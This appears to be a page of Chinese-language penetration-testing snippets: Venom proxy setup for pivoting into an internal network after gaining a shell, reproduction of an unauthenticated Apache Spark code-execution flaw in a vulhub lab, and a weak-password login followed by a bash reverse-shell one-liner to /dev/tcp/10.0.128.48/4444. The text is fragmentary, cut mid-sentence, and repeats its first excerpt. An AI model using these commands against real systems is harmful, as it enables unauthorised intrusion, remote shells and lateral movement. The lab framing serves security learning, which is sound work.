前提：已经拿到某服务器shell，可以上传文件且具有执行权限；项目地址(编译后):https://github.com/Dliv3/Venom/releases一、进入内网1.上传admin_linux_x64到vps端，运行并监听本地11111端口：chmod 777 admin_linux_x64./ admin_linux_x64 -lport 111112.利用已经拿到的的shell上传a

Apache Spark是一款集群计算系统，其支持用户向管理节点提交应用，并分发给集群执行。如果管理节点未启动ACL（访问控制），我们将可以在集群中执行任意代码。本次复现使用docker+vulhub一键搭建：docker-compose up -d环境启动后，会自动启用四个端口：8080，8081，6066，7077他们分别为：master的管理页面：http://your-ip:8080sla

使用弱口令尝试登录（admin:admin root:root admin:123456）#!/bin/bashbash -i >& /dev/tcp/10.0.128.48/4444 0>&1随意命名备注名称，点击保存监听端口，点击执行，回弹shell

前提：已经拿到某服务器shell，可以上传文件且具有执行权限；项目地址(编译后):https://github.com/Dliv3/Venom/releases一、进入内网1.上传admin_linux_x64到vps端，运行并监听本地11111端口：chmod 777 admin_linux_x64./ admin_linux_x64 -lport 111112.利用已经拿到的的shell上传a